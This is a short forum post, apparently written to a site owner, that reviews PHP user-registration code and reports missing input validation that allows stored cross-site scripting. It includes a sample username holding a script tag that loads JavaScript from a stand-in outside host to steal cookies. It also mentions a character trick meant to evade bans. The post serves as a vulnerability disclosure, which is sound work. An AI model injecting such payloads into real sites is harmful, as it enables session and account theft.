I've looked at the source, looks like you have quite a lot of XSS vulnerabilities
you can also pick a username with the skull altcode, so nobody can ban or target you whatsoever
Code:
$first_name = (isset($_POST["username"]) ? $core->Filter($_POST["username"]) : null);
//here it just filters the username, so blabla"blabla will become blabla\"blabla, nothing wrong with that, but you can still pick this name
if(is_null($first_name))
{
$registerErrors[] = "You must enter a username.";
}
//just checks if it's null, nothing wrong with it
$full_name = $first_name;
if(!$users->CheckUsername($full_name))
{
$registerErrors[] = "That username is unavailable.";
}
//Here it checks if there's the same username already, there's no check what characters you can use whatsoever
//you can just fill in <script src="http://whateverwebsite.com/blabla.js"></script> and steal some cookies!
If I'm wrong, just tell me, but it looks like there's a lot of XSS exploits one can use, this is just one example.